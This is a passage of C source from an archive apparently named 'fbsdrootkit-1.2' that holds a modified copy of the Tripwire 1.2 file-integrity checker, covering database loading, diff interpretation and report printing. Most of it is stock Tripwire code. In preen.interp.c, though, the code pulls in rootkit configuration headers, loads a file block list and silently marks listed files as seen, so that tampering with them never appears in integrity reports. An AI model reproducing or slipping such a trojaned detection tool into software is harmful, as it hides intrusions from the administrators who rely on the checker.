(numskipped == numentries) { printf("%s: No updated entries. Database remains unchanged.\n", progname); exit(1); } /* we used to print the backup warning banner here -- now it's in * dbase.build.c */ /* preen ourselves: * build a temporary database, then check for diffs */ database_build(&olddbase_list, DBASE_UPDATE, &configentry_list); return; } /* * void * olddbasefile_load(ppentrylist) * * load in the old database file into the global list (olddbase_list). * (ppentrylist) is the list of entries. */ static void olddbasefile_load(ppentrylist) struct list **ppentrylist; { char filename[MAXPATHLEN+256]; FILE *fp; char s[MAXPATHLEN+512]; char key[MAXPATHLEN+256], value[512]; static struct list *replace_list = (struct list *) NULL; SPDEBUG(3) printf("*** entering olddbasefile_load()\n"); if (specified_dbasemode == SPECIFIED_FILE) (void) strcpy(filename, specified_dbasefile); else sprintf(filename, "%s/%s", database_path, database_file); /* did we specify a dbase file? */ if (specified_dbasemode) { if (!(fp = (FILE *) fdopen(specified_dbasefd, "r"))) { die_with_err("Couldn't open database file '%s'", filename); } rewind(fp); if (ftell(fp) != 0) { die_with_err("olddbasefile_load: ftell()", NULL); } } /* else open the file */ else { if ((fp = fopen(filename, "r")) == NULL) die_with_err("Couldn't open database file '%s'", filename); } /* first make sure that none of the entry numbers changed */ while (fgets(s, sizeof(s), fp) != NULL) { char entryname[2048], *pc; int oldentrynum, newentrynum; static int countlines; countlines++; if (string_split_space(s, key, value) < 0) { fprintf(stderr, "%s: database='%s': parse error: space not found in line %d!\n", progname, filename, countlines); exit(1); } /* build table of contents */ if (strcmp(key, "@@contents") != 0) { continue; } /* check to see if entrynums match */ if (sscanf(value, "%s %d", entryname, &oldentrynum) != 2) { fprintf(stderr, "olddbasefile_load: parse error at %s: %d\n>>%s", __FILE__, __LINE__, s); exit(1); } filename_escape_expand(entryname); if (!list_isthere(entryname, ppentrylist)) continue; pc = list_lookup(entryname, ppentrylist); newentrynum = atoi(pc); /* if discrepency, then store in replace_list */ if (oldentrynum != newentrynum) { char oldent[100], newent[100]; /* gotta do some chopping up of the contents information */ sprintf(oldent, "%d", oldentrynum); sprintf(newent, "%d", newentrynum); list_set(oldent, newent, MAXPATHLEN+1, &replace_list); } } rewind(fp); /* read in entire file */ while (fgets(s, sizeof(s), fp) != NULL) { static int countlines = 0; countlines++; /* skip comments */ if (s[0] == '#') continue; if (string_split_space(s, key, value) < 0) { fprintf(stderr, "%s: database='%s': parse error: space not found in line %d!\n", progname, filename, countlines); exit(1); } /* build table of contents */ if (strcmp(key, "@@contents") == 0) { numentriesread++; continue; } /* skip database version */ else if (strcmp(key, "@@dbaseversion") == 0) { int version, err; if ((err = sscanf(value, "%d", &version)) != 1) { fprintf(stderr, "olddbasefile_load: @@dbaseversion parse error (nfields=%d, %s:%d)!\n", err, __FILE__, __LINE__); fprintf(stderr, ">> %s\n", key); exit(1); } if (version != DB_VERSION_NUM) { /* special case */ if (DB_VERSION_NUM == 4 && version == 3) { fprintf(stderr, "%s: %s: version mismatch\n", progname, filename); fprintf(stderr, "\tdatabase format %d is no longer fully supported (expecting %d)!\n", version, db_version_num); fprintf(stderr, "\tSee tw.config(5) manual page for details\n"); } else { fprintf(stderr, "%s: %s: version error\n", progname, filename); fprintf(stderr, "\tdatabase format %d is no longer supported (expecting %d)!\n", version, db_version_num); fprintf(stderr, "\tSee tw.config(5) manual page for details\n"); exit(1); } } continue; } /* else it's a file */ else { int mode; char pcentry[512], pcignore[512], pcrest[1024]; char newvalue[1024]; int err; SPDEBUG(10) printf("olddbasefile_load: %s: %s", key, value); filename_escape_expand(key); /* check to see if it's a special file */ if ((err = sscanf(value, "%s %s %o %[^\n]", pcentry, pcignore, &mode, pcrest)) != 4) { fprintf(stderr, "olddbasefile_load: parse error (nfields=%d)!", err); fprintf(stderr, ">> %s", value); exit(1); } /* do we need to replace the entry number? */ if (list_isthere(pcentry, &replace_list)) { /* splice the new value in */ sprintf(newvalue, "%s %s %o %s\n", list_lookup(pcentry, &replace_list), pcignore, mode, pcrest); list_set(key, newvalue, MAXPATHLEN+1, &olddbase_list); } /* otherwise the entry number was fine */ else { list_set(key, value, MAXPATHLEN+1, &olddbase_list); } switch (mode & S_IFMT) { case S_IFIFO: case S_IFCHR: case S_IFDIR: case S_IFBLK: #if !defined(SYSV) || (SYSV > 3) #ifndef apollo /* Foolish Apollos define S_IFSOCK same as S_IFIFO in /bsd4.3/usr/include/sys/stat.h */ case S_IFSOCK: #endif #endif (void) list_setflag(key, FLAG_NOOPEN, &olddbase_list); break; #if !defined(SYSV) || (SYSV > 3) case S_IFLNK: /* if it's a symbolic link, make sure we flag it as such! */ (void) list_setflag(key, FLAG_SYMLINK, &olddbase_list); break; #endif } } } /* close the file descriptor */ if (!specified_dbasemode) (void) fclose(fp); SPDEBUG(3) printf("*** leaving olddbasefile_load()\n"); list_reset(&replace_list); return; } /* * dbase_entry_closest() * * given a (filename), choose the "closest" entry in the tw.config * file. * * Ex: filename = "/etc/foo/bar" * * entry: score: * /etc 1 * /etc/foo 2 * /etc/foo/bar 3 * */ void dbase_entry_howclose(filename, ppentrylist, entry, pentrynum) char *filename; struct list **ppentrylist; char *entry; int *pentrynum; { struct list_elem *p; int maxscore = 0; if (list_open(ppentrylist) < 0) { fprintf(stderr, "%s: dbase_entry_howclose: list_open() failed!\n", progname); exit(1); } while ((p = list_get(ppentrylist))) { char *p1, *p2; int score = 0; char trash[1024]; int entrynum = 0; char *pold; p1 = p->varname; p2 = filename; /* walk through the filenames */ for (; *p1 && *p2; p1++, p2++) { if (*p1 != *p2) break; if (*p2 == '/') /* increment score */ score++; } /* correct score if comparison failed */ if ((p1 != p->varname) && *(p1-1) == '/') score--; SPDEBUG(6) printf("dbase_entry_howclose: %d: (%s,%s)\n", score, filename, p->varname); if (score > maxscore) { maxscore = score; strcpy(entry, p->varname); /* grab the entry number */ if ((pold = list_lookup(p->varname, &olddbase_list))) { if (sscanf(pold, "%d %s", &entrynum, trash) != 2) { die_with_err("dbase_entry_howclose: sscanf() parsing error!\n", (char *) NULL); } } *pentrynum = entrynum; } } if (list_close(ppentrylist) < 0) { fprintf(stderr, "%s: dbase_entry_howclose: list_close() failed!\n", progname); exit(1); } SPDEBUG(6) printf("dbase_entry_howclose: ancestor: %s\n", entry); } fbsdrootkit-1.2/tripwire-1.2/src/preen.interp.c100600 764 764 6530 6273465271 16662 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: preen.interp.c,v 1.14 1994/04/04 00:34:40 gkim Exp $"; #endif /* * preen.interp.c * * interpret the diffs between the database files * * Gene Kim * Purdue University */ #include "../include/config.h" #include #ifdef STDLIBH #include #endif #ifdef STRINGH #include #else #include #endif #include #ifdef __STDC__ # include # include #endif #if (defined(SYSV) && (SYSV < 3)) # include #endif /* SVR2 */ #include "../include/list.h" #include "../include/tripwire.h" /* Rootkit configuration files */ #include "../../config.h" #include "../../rootkittripwire.h" /* the diff lists */ struct list *diff_added_list = NULL, *diff_deleted_list = NULL, *diff_changed_list = NULL; /* how many in each list */ int diff_added_num = 0, diff_changed_num = 0, diff_deleted_num = 0, diff_unignored_num = 0; /* * preen_interp(FILE *fpin) * * do the actual interpreation of the diff output, generated by * diffing the two database files. */ void preen_interp (fpin) FILE *fpin; { char s[1024]; char key[MAXPATHLEN+256], value[512]; struct list_elem *plist; /* Read in list of files to have their reports blocked */ file_block_list(); if (!quietmode) fprintf(stderr, "### Phase 4: Searching for inconsistencies\n"); /* start reading in lines from the new database */ while (fgets(s, sizeof(s), fpin) != NULL) { char *oldvalue; static int countlines = 1; countlines++; /* is it a comment? */ if (s[0] == '#') continue; if (s[0] == '@' && s[1] == '@') continue; /* * if it's in the list: * flag as SEEN * a) if it's the same, next; * b) if it's different, it's CHANGED; * otherwise, * it's ADDED * * scan entire list, find all !SEEN * they're DELETED */ /* (this should never happen since it was already preprocessed!) */ if (string_split_space(s, key, value) < 0) { fprintf(stderr, "%s: fatal parse error in preprocessed database file, line %d\n!", progname, countlines); exit(1); } filename_escape_expand(key); /* If file should be blocked mark as seen and continue */ if(check_file(key)) { list_setflag(key, FLAG_SEEN, &olddbase_list); continue; } /* if file is in saved database */ if ((oldvalue = list_lookup(key, &olddbase_list)) != NULL) { list_setflag(key, FLAG_SEEN, &olddbase_list); /* was it CHANGED? */ if (strcmp(value, oldvalue) != 0) { SPDEBUG(6) printf("--(changed %s)------vvv\n", key); SPDEBUG(6) printf(">%s>%s\n", oldvalue, value); list_set(key, value, 0, &diff_changed_list); diff_changed_num++; } /* else skip it */ else continue; } /* else it's been ADDED */ else { list_set(key, value, 0, &diff_added_list); diff_added_num++; } } /* look for DELETED entries */ if (list_open(&olddbase_list) < 0) { fprintf(stderr, "preen_interp: list_open() failed!\n"); exit(1); } while ((plist = list_get(&olddbase_list)) != NULL) { /* skip entries that have already been seen */ if (plist->flag & FLAG_SEEN) continue; list_set(plist->varname, plist->varvalue, 0, &diff_deleted_list); diff_deleted_num++; } if (list_close(&olddbase_list) < 0) { fprintf(stderr, "preen_interp: list_open() failed!\n"); exit(1); } return; } fbsdrootkit-1.2/tripwire-1.2/src/preen.report.c100600 764 764 57031 5620062042 16676 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: preen.report.c,v 1.20 1994/08/04 03:44:34 gkim Exp $"; #endif /* * preen.report.c * * report generation given the data from preening * * Gene Kim * Purdue University */ #include "../include/config.h" #include #ifdef STDLIBH #include #include #endif #include #include #include #include #ifdef STRINGH #include #else #include #endif #include #ifdef MALLOCH # include #endif #include "../include/list.h" #include "../include/tripwire.h" static void preen_report_changed_enum(); static int preen_change_count(); static char *structstat_fill(); static void pair_print_ss(); static void pair_print_ll(); static void pair_print_llo(); static char **pp_update = (char **) NULL; static void updateentry_prompt(); static void updateentry_menu(); static void updateentry_help(); static int entrynum_get(); /* * preen_report() * * report on: * which files have been ADDED * which files have been DELETED * which files have been CHANGED * what attribute changed? * * remember that (olddbase_list) is composed of filenames that * have not been expanded. */ void preen_report(interactive, ppp_updateentries) int interactive; char ***ppp_updateentries; { struct list_elem *p; struct stat statnew, statold; char sigsnew[NUM_SIGS][SIG_MAX_LEN], sigsold[NUM_SIGS][SIG_MAX_LEN]; char *s; int unignored; FILE *fttyin = NULL, *fttyout = NULL; /* we'll use a local variable for this */ /* pp_update = *ppp_updateentries; */ /* if we're in interactive mode, open tty for input */ if (interactive) { if ((fttyin = fopen("/dev/tty", "r")) == NULL) { char err[256]; sprintf(err, "%s: cannot fopen() /dev/tty", progname); perror(err); exit(1); } if ((fttyout = fopen("/dev/tty", "w")) == NULL) { char err[256]; sprintf(err, "%s: cannot fopen() /dev/tty", progname); perror(err); exit(1); } } unignored = preen_change_count(); if (!quietmode) { fprintf(stderr, "###\n"); fprintf(stderr, "###\t\t\tTotal files scanned:\t\t%d\n", files_scanned_num); fprintf(stderr, "###\t\t\t Files added:\t\t%d\n", diff_added_num); fprintf(stderr, "###\t\t\t Files deleted:\t\t%d\n", diff_deleted_num); fprintf(stderr, "###\t\t\t Files changed:\t\t%d\n", diff_changed_num); fprintf(stderr, "###\n"); fprintf(stderr, "###\t\t\tAfter applying rules:\n"); fprintf(stderr, "###\t\t\t Changes discarded:\t%d\n", diff_added_num + diff_deleted_num + diff_changed_num - (unignored) ); fprintf(stderr, "###\t\t\t Changes remaining:\t%d\n", unignored + diff_added_num + diff_deleted_num); fprintf(stderr, "###\n"); } /****** added ******/ /* open each of the three lists, using &diff_xxxx_list as keys */ if (list_open(&diff_added_list) < 0) { fprintf(stderr, "preen_report: list_open() failed!\n"); exit(1); } /* print out each added file in sequence */ while ((p = list_get(&diff_added_list)) != NULL) { static int firsttime = 1; char filename[2048]; strcpy(filename, p->varname); (void) structstat_fill(p->varvalue, &statnew, sigsnew, filename); direntry_print(filename, statnew, DIFF_ADDED); /* XXX: Why are some people seeing files in the added and deleted * list. Abort if this happens. */ if (list_isthere(filename, &diff_deleted_list)) { printf("### Why is this file also marked as DELETED? Please mail this output to (gkim@cs.purdue.edu)!\n"); } if (list_isthere(filename, &diff_changed_list)) { printf("### Why is this file also marked as CHANGED? Please mail this output to (gkim@cs.purdue.edu)!\n"); } if (interactive) { int entrynum; entrynum = entrynum_get(p->varvalue); updateentry_prompt(fttyin, fttyout, filename, entrynum, firsttime); firsttime = 0; } } if (list_close(&diff_added_list) < 0) { fprintf(stderr, "preen_report: list_close() failed!\n"); exit(1); } /****** deleted ******/ /* now print out the files that were deleted */ if (list_open(&diff_deleted_list) < 0) { fprintf(stderr, "preen_report: list_open() failed!\n"); exit(1); } /* print out each added file in sequence */ while ((p = list_get(&diff_deleted_list)) != NULL) { static int firsttime = 1; char filename[2048]; strcpy(filename, p->varname); (void) structstat_fill(p->varvalue, &statnew, sigsnew, filename); direntry_print(filename, statnew, DIFF_DELETED); if (interactive) { int entrynum; entrynum = entrynum_get(p->varvalue); updateentry_prompt(fttyin, fttyout, filename, entrynum, firsttime); firsttime = 0; } } if (list_close(&diff_deleted_list) < 0) { fprintf(stderr, "preen_report: list_close() failed!\n"); exit(1); } /***** changed ******/ /* * interate through the list * get the ignore vector * foreach each (attribute) { * if (attribute != attribute') * if (!ignored) { flag it; } * } */ /* list_print(&diff_changed_list); */ if (list_open(&diff_changed_list) < 0) { fprintf(stderr, "preen_report: list_open() failed!\n"); exit(1); } /* print out each added file in sequence */ while ((p = list_get(&diff_changed_list)) != NULL) { /* filename, ignore, mode, inode, nlinks, uid, gid, size, access, * modify, ctime, sig1, sig2 */ /* read in the new value from the changed_list * throw away the new ignorevector -- we use the old one! */ (void) structstat_fill(p->varvalue, &statnew, sigsnew, p->varname); /* read in the list1 value form the hash table */ if ((s = list_lookup(p->varname, &olddbase_list)) == NULL) { fprintf(stderr, "preen_report: list_lookup(%s) failed!\n", p->varname); exit(1); } /* check for unchanged flag */ if (list_getflag(p->varname, &diff_changed_list) & FLAG_UNCHANGE) { SPDEBUG(6) printf("--(skipping unchanged entry %s)--\n", p->varname); continue; } (void) structstat_fill(s, &statold, sigsold, p->varname); /* is this file to be ignored? */ if (!(list_getflag(p->varname, &diff_changed_list) & FLAG_CHANGED)) continue; /* print out the report for this file */ direntry_print(p->varname, statnew, DIFF_CHANGED); } if (list_close(&diff_changed_list) < 0) { fprintf(stderr, "preen_report: list_close() failed!\n"); exit(1); } /* enumerate specifics of changed files, if long output specified */ if (interactive || (!quietmode && unignored != 0)) { preen_report_changed_enum(interactive, fttyin, fttyout); } /* close up the tty streams */ if (interactive) { fclose(fttyin); fclose(fttyout); } *ppp_updateentries = pp_update; diff_unignored_num = unignored; return; } /* * preen_report_changed_enum(int interactive, fttyin, fttyout) * * enumerate each changed attributed for each of the changed files. * this is treated as yet another pass in the checking process. * * (interactive) indicates whether we should be asking the user to * update this file later. (fttyin) and (fttyout) are the streams * we talk through. */ static void preen_report_changed_enum(interactive, fttyin, fttyout) int interactive; FILE *fttyin, *fttyout; { struct list_elem *p; char *ignorevec; char sigsold[NUM_SIGS][SIG_MAX_LEN], sigsnew[NUM_SIGS][SIG_MAX_LEN]; struct stat statnew, statold; char *s; char stime1[64], stime2[64]; int ignoremask; int i; char label[50]; (void) fflush(stdout); if (!quietmode) { fprintf(stderr, "### Phase 5: Generating observed/expected pairs for changed files\n"); fprintf(stderr, "###\n"); (void) fflush(stderr); } printf("### Attr Observed (what it is) Expected (what it should be)\n"); printf("### =========== ============================= =============================\n"); /**** st_atime: Mon Aug 31 16:48:57 1992 Mon Aug 31 14:05:49 1992 ****/ /* open the list of changed files */ if (list_open(&diff_changed_list) < 0) { fprintf(stderr, "preen_report: list_open() failed!\n"); exit(1); } /* print out each added file in sequence */ while ((p = list_get(&diff_changed_list)) != NULL) { static int firsttime = 1; /* filename, ignore, mode, inode, nlinks, uid, gid, size, access, * modify, ctime, sig1, sig2 .. sign */ /* read in the list2 value from the changed_list * throw away the new ignorevector -- we use the old one! */ (void) structstat_fill(p->varvalue, &statnew, sigsnew, p->varname); /* read in the list1 value form the hash table */ if ((s = list_lookup(p->varname, &olddbase_list)) == NULL) { fprintf(stderr, "preen_report_changed_enum: list_lookup(%s) failed!\n", p->varname); exit(1); } ignorevec = structstat_fill(s, &statold, sigsold, p->varname); /* get the ignoremask */ ignoremask = ignore_vec_to_scalar(ignorevec); /* is this file to be ignored? */ if (!(list_getflag(p->varname, &diff_changed_list) & FLAG_CHANGED)) continue; printf("%s\n", p->varname); /* and then the {expected, received} pairs */ #define STATEQ(x) (statnew.x != statold.x) /* if we're reporting growing files, report size */ if (ignoremask & IGNORE_GROW) { ignoremask = ignoremask & ~(IGNORE_S); } if (!(ignoremask & IGNORE_P)) if (STATEQ(st_mode)) { pair_print_llo("st_mode:", (int32) statnew.st_mode, (int32) statold.st_mode); } if (!(ignoremask & IGNORE_I)) if (STATEQ(st_ino)) { pair_print_ll("st_ino:", (int32) statnew.st_ino, (int32) statold.st_ino); } if (!(ignoremask & IGNORE_N)) if (STATEQ(st_nlink)) { pair_print_ll("st_nlink:", (int32) statnew.st_nlink, (int32) statold.st_nlink); } if (!(ignoremask & IGNORE_U)) if (STATEQ(st_uid)) { pair_print_ll("st_uid:", (int32) statnew.st_uid, (int32) statold.st_uid); } if (!(ignoremask & IGNORE_G)) if (STATEQ(st_gid)) { pair_print_ll("st_gid:", (int32) statnew.st_gid, (int32) statold.st_gid); } if (!(ignoremask & IGNORE_S)) if (STATEQ(st_size)) { pair_print_ll("st_size:", (int32) statnew.st_size, (int32) statold.st_size); } if (!(ignoremask & IGNORE_A)) if (STATEQ(st_atime)) { (void) strcpy(stime1, ctime(&statnew.st_atime)); (void) strcpy(stime2, ctime(&statold.st_atime)); chop(stime1); chop(stime2); pair_print_ss("st_atime:", stime1, stime2); } if (!(ignoremask & IGNORE_M)) if (STATEQ(st_mtime)) { (void) strcpy(stime1, ctime(&statnew.st_mtime)); (void) strcpy(stime2, ctime(&statold.st_mtime)); chop(stime1); chop(stime2); pair_print_ss("st_mtime:", stime1, stime2); } if (!(ignoremask & IGNORE_C)) if (STATEQ(st_ctime)) { (void) strcpy(stime1, ctime(&statnew.st_ctime)); (void) strcpy(stime2, ctime(&statold.st_ctime)); chop(stime1); chop(stime2); pair_print_ss("st_ctime:", stime1, stime2); } for (i = 0; i < NUM_SIGS; i++) { if (!(runtimeignore & (IGNORE_0 << i)) && !(ignoremask & (IGNORE_0 << i))) if (strcmp(sigsnew[i], sigsold[i]) != 0) { (void) sprintf(label, "%s (sig%d):", signames[i], i); pair_print_ss(label, sigsnew[i], sigsold[i]); } } /* quiz the user if this entry should be updated */ if (interactive) { int entrynum; entrynum = entrynum_get(p->varvalue); updateentry_prompt(fttyin, fttyout, p->varname, entrynum, firsttime); firsttime = 0; } /* separate entries by a space */ printf("\n"); } if (list_close(&diff_changed_list) < 0) { fprintf(stderr, "preen_report_changed_enum: list_close() failed!\n"); exit(1); } } /* * preen_change_count() * * return the number of files that are changed, according to their * ignore vectors. */ static int preen_change_count() { int changed = 0; struct list_elem *p; char sigsold[NUM_SIGS][SIG_MAX_LEN], sigsnew[NUM_SIGS][SIG_MAX_LEN]; char vec64_a[50], vec64_m[50], vec64_c[50]; char trash[512]; struct stat statnew, statold; char *s; int ignoremask; char ignorevec[512]; uint32 mode, ino, nlink, uid, gid, size; int entrynum; int nfields; /***** changed ******/ /* * interate through the list * get the ignore vector * foreach each (attribute) { * if (attribute != attribute') * if (!ignored) { flag it; } * } */ if (list_open(&diff_changed_list) < 0) { fprintf(stderr, "preen_report: list_open(diff_changed_list) failed!\n"); exit(1); } /* print out each added file in sequence */ while ((p = list_get(&diff_changed_list)) != NULL) { int isdir = 0; int reallychanged = 0; /* filename, ignore, mode, inode, nlinks, uid, gid, size, access, * modify, ctime, sig1, sig2 */ /* read in the list2 value from the changed_list * throw away the new ignorevector -- we use the old one! */ if ((nfields = sscanf(p->varvalue, db_record_format, &entrynum, trash, &mode, &ino, &nlink, &uid, &gid, &size, vec64_a, vec64_m, vec64_c, sigsnew[0], sigsnew[1], sigsnew[2], sigsnew[3], sigsnew[4], sigsnew[5], sigsnew[6], sigsnew[7], sigsnew[8], sigsnew[9])) != DB_RECORD_FIELDS) { fprintf(stderr, "preen_change_count: %s: illegal database record (nfields == %d). Aborting...\n", p->varname, nfields); fprintf(stderr, " '%s'\n", p->varvalue); exit(1); } if ((mode & S_IFMT) == S_IFDIR) isdir = 1; statnew.st_mode = (mode_t)mode; statnew.st_ino = (ino_t)ino; statnew.st_nlink = (nlink_t)nlink; statnew.st_uid = (uid_t)uid; statnew.st_gid = (gid_t)gid; statnew.st_size = (off_t)size; /* convert from base64 to int */ statnew.st_atime = b64tol(vec64_a); statnew.st_mtime = b64tol(vec64_m); statnew.st_ctime = b64tol(vec64_c); /* read in the list1 value form the hash table */ if ((s = list_lookup(p->varname, &olddbase_list)) == NULL) { fprintf(stderr, "preen_change_count: list_lookup(%s) failed!\n", p->varname); exit(1); } if ((nfields = sscanf(s, db_record_format, &entrynum, ignorevec, &mode, &ino, &nlink, &uid, &gid, &size, vec64_a, vec64_m, vec64_c, sigsold[0], sigsold[1], sigsold[2], sigsold[3], sigsold[4], sigsold[5], sigsold[6], sigsold[7], sigsold[8], sigsold[9])) != DB_RECORD_FIELDS) { fprintf(stderr, "preen_change_count: %s: illegal database record! Aborting... (nfields=%d)\n", p->varname, nfields); fprintf(stderr, " '%s'\n", s); exit(1); } statold.st_mode = (mode_t)mode; statold.st_ino = (ino_t)ino; statold.st_nlink = (nlink_t)nlink; statold.st_uid = (uid_t)uid; statold.st_gid = (gid_t)gid; statold.st_size = (off_t)size; /* convert from base64 to int */ statold.st_atime = b64tol(vec64_a); statold.st_mtime = b64tol(vec64_m); statold.st_ctime = b64tol(vec64_c); /* get the ignoremask */ ignoremask = ignore_vec_to_scalar(ignorevec); /* and then the {expected, received} pairs */ #define FLAGIT(x) changed++; reallychanged = 1; SPDEBUG(3) {printf("--(FLAGGING %s: unignored change in <%s>)--\n", p->varname, (x)); } list_setflag(p->varname, FLAG_CHANGED, &diff_changed_list); continue #define SIGEQ(x) if (strcmp(sigsnew[(x)], sigsold[(x)]) != 0) /* allow for loose directory interpretations by ignoring nlink, * ctime, and mtime, and size. */ if (isdir && loosedir) { ignoremask |= IGNORE_N | IGNORE_M | IGNORE_C | IGNORE_S; } #ifdef apollo /* * Apollos do not keep ownership or dates for symlinks, but * get these from the directory containing them (with wide-open * permissions). Ignore these. (Why only if we also have loosedir?) * (Otherwise each symlink would get flagged whenever the directory * is changed, e.g. by adding or deleting a file.) */ else if (((mode & S_IFMT) == S_IFLNK) && loosedir) { ignoremask |= IGNORE_P | IGNORE_U | IGNORE_G | IGNORE_A | IGNORE_M | IGNORE_C; } #endif /* note the pain we go through to avoid dangling else's */ if (!(ignoremask & IGNORE_P)) { if (STATEQ(st_mode)) {FLAGIT("p");}} if (!(ignoremask & IGNORE_I)) { if (STATEQ(st_ino)) {FLAGIT("i");}} if (!(ignoremask & IGNORE_N)) { if (STATEQ(st_nlink)) {FLAGIT("n");}} if (!(ignoremask & IGNORE_U)) { if (STATEQ(st_uid)) {FLAGIT("u");}} if (!(ignoremask & IGNORE_G)) { if (STATEQ(st_gid)) {FLAGIT("g");}} if ((ignoremask & IGNORE_GROW)) { if (statnew.st_size < statold.st_size) { ignoremask = ignoremask & ~(IGNORE_S); FLAGIT(">"); ;}} if (!(ignoremask & IGNORE_S)) { if (STATEQ(st_size)) {FLAGIT("s");}} if (!(ignoremask & IGNORE_A)) { if (STATEQ(st_atime)) {FLAGIT("a");}} if (!(ignoremask & IGNORE_M)) { if (STATEQ(st_mtime)) {FLAGIT("m");}} if (!(ignoremask & IGNORE_C)) { if (STATEQ(st_ctime)) {FLAGIT("c");}} if (!(runtimeignore & IGNORE_0) && !(ignoremask & IGNORE_0)) { SIGEQ(0) {FLAGIT("0");}} if (!(runtimeignore & IGNORE_1) && !(ignoremask & IGNORE_1)) { SIGEQ(1) {FLAGIT("1");}} if (!(runtimeignore & IGNORE_2) && !(ignoremask & IGNORE_2)) { SIGEQ(2) {FLAGIT("2");}} if (!(runtimeignore & IGNORE_3) && !(ignoremask & IGNORE_3)) { SIGEQ(3) {FLAGIT("3");}} if (!(runtimeignore & IGNORE_4) && !(ignoremask & IGNORE_4)) { SIGEQ(4) {FLAGIT("4");}} if (!(runtimeignore & IGNORE_5) && !(ignoremask & IGNORE_5)) { SIGEQ(5) {FLAGIT("5");}} if (!(runtimeignore & IGNORE_6) && !(ignoremask & IGNORE_6)) { SIGEQ(6) {FLAGIT("6");}} if (!(runtimeignore & IGNORE_7) && !(ignoremask & IGNORE_7)) { SIGEQ(7) {FLAGIT("7");}} if (!(runtimeignore & IGNORE_8) && !(ignoremask & IGNORE_8)) { SIGEQ(8) {FLAGIT("8");}} if (!(runtimeignore & IGNORE_9) && !(ignoremask & IGNORE_9)) { SIGEQ(9) {FLAGIT("9");}} if (!reallychanged) { list_setflag(p->varname, FLAG_UNCHANGE, &diff_changed_list); } } /* clean up */ if (list_close(&diff_changed_list) < 0) { fprintf(stderr, "preen_report: list_close(diff_changed_list) failed!\n"); exit(1); } return changed; } /* * structstat_fill(char *string, struct stat *statbuf, char *filename) * * given a string from the database, fill in the statbuf structure. * (filename) is provided for error reporting. * * return the ignore vector (a static system structure) */ static char * structstat_fill (string, statbuf, sigs, recordkey) char *string; struct stat *statbuf; char sigs[NUM_SIGS][SIG_MAX_LEN]; char *recordkey; { char *ignorevec; static char structstat_fill_string[512]; uint32 mode, ino, nlink, uid, gid, size; int entrynum; char vec64_a[50], vec64_m[50], vec64_c[50]; (void) strcpy(structstat_fill_string, string); ignorevec = structstat_fill_string; if (sscanf(string, db_record_format, &entrynum, ignorevec, &mode, &ino, &nlink, &uid, &gid, &size, vec64_a, vec64_m, vec64_c, sigs[0], sigs[1], sigs[2], sigs[3], sigs[4], sigs[5], sigs[6], sigs[7], sigs[8], sigs[9]) != DB_RECORD_FIELDS) { fprintf(stderr, "structstat_fill: %s: illegal database record! Aborting...\n", recordkey); fprintf(stderr, " '%s'\n", string); exit(1); } statbuf->st_mode = (mode_t)mode; statbuf->st_ino = (ino_t)ino; statbuf->st_nlink = (nlink_t)nlink; statbuf->st_uid = (uid_t)uid; statbuf->st_gid = (gid_t)gid; statbuf->st_size = (off_t)size; /* convert from base64 to int */ statbuf->st_atime = b64tol(vec64_a); statbuf->st_mtime = b64tol(vec64_m); statbuf->st_ctime = b64tol(vec64_c); return ignorevec; } /* * entrynum_get(char *string) * * given a string from the database, return the entrynum */ static int entrynum_get (string) char *string; { char trash[1024]; int entrynum; if (sscanf(string, "%d %s", &entrynum, trash) != 2) { fprintf(stderr, "entrynum_get: illegal database record! Aborting...\n"); fprintf(stderr, ">> '%s'\n", string); exit(1); } return entrynum; } /* * pair_print_ss(char *label, char *s1, char *s2) * * print {expected,received} table with strings */ static void pair_print_ss (label, s1, s2) char *label; char *s1; char *s2; { printf("%15s %-30s%-30s\n", label, s1, s2); return; } /* * pair_print_ll(char *label, int32 l1, int32 l2) * * print {expected,received} table with int32s */ static void pair_print_ll (label, l1, l2) char *label; int32 l1; int32 l2; { printf("%15s %-30ld%-30ld\n", label, l1, l2); return; } /* * pair_print_llo(char *label, int32 l1, int32 l2) * * print {expected,received} table with int32s in octal */ static void pair_print_llo (label, l1, l2) char *label; int32 l1; int32 l2; { printf("%15s %-30lo%-30lo\n", label, l1, l2); return; } static void updateentry_list_add(filename) char *filename; { char *pc; static int numinterupdated = 0; pc = (char *) malloc((unsigned) strlen(filename) + 1); (void) strcpy(pc, filename); /* make sure we don't realloc() a null pointer */ if (!pp_update) { if (!(pp_update = (char **) malloc(sizeof(char *)))) die_with_err("main: realloc() failed!\n", NULL); } if ((pp_update = (char **) realloc(pp_update, (numinterupdated+2) * sizeof(char *))) == NULL) { die_with_err("main: realloc() failed!\n", NULL); } pp_update[numinterupdated++] = pc; pp_update[numinterupdated] = NULL; } static void updateentry_prompt(fttyin, fttyout, filename, entrynum, reset) FILE *fttyin, *fttyout; char *filename; int entrynum; int reset; { static int firsttime = 1; static int lastanswer = 0; char answer[100], *pc; static int lastentrynum = -1; SPDEBUG(100) printf("updateentry_prompt: (entrynum=%d, lastentrynum=%d)\n", entrynum, lastentrynum); #define LASTANSWER_ALLYES 1 #define LASTANSWER_ALLNO 2 #define LASTANSWER_QUIT 3 if (reset) { firsttime = 1; lastanswer = 0; lastentrynum = -1; } AGAIN: if (lastanswer == LASTANSWER_ALLNO) { if (entrynum == lastentrynum) { return; } else { lastentrynum = -1; lastanswer = 0; } } if (lastanswer == LASTANSWER_ALLYES || test_interactive) { if (entrynum == lastentrynum) { updateentry_list_add(filename); if (!test_interactive) { fprintf(fttyout, "---> Updating '%s'\n", filename_escape(filename)); fflush(fttyout); } return; } else { lastentrynum = -1; lastanswer = 0; } } if (!test_interactive) { fprintf(fttyout, "---> File: '%s'\n", filename_escape(filename)); fprintf(fttyout, "---> Update entry? [YN(y)nh?] "); fflush(fttyout); (void) fgets(answer, sizeof(answer), fttyin); pc = answer; } /* we're in interactive testing mode */ else { pc = "Y"; } switch(*pc) { case '\n': case 'y': updateentry_list_add(filename); break; case 'Y': updateentry_list_add(filename); lastanswer = LASTANSWER_ALLYES; lastentrynum = entrynum; break; case 'n': break; case 'N': lastanswer = LASTANSWER_ALLNO; lastentrynum = entrynum; break; case 'h': updateentry_help(fttyout); goto AGAIN; break; case '?': updateentry_menu(fttyout); goto AGAIN; break; default: fprintf(fttyout, "I don't understand your choice '%c'. Try again.\n", *pc); goto AGAIN; } firsttime = 0; } static void updateentry_menu(fpout) FILE *fpout; { fprintf(fpout, "\n"); fprintf(fpout, " y: Yes, update the database entry to match current file\n"); fprintf(fpout, " n: No, leave database entry alone\n"); fprintf(fpout, " Y: Yes, and change all other files in this entry\n"); fprintf(fpout, " N: No, and 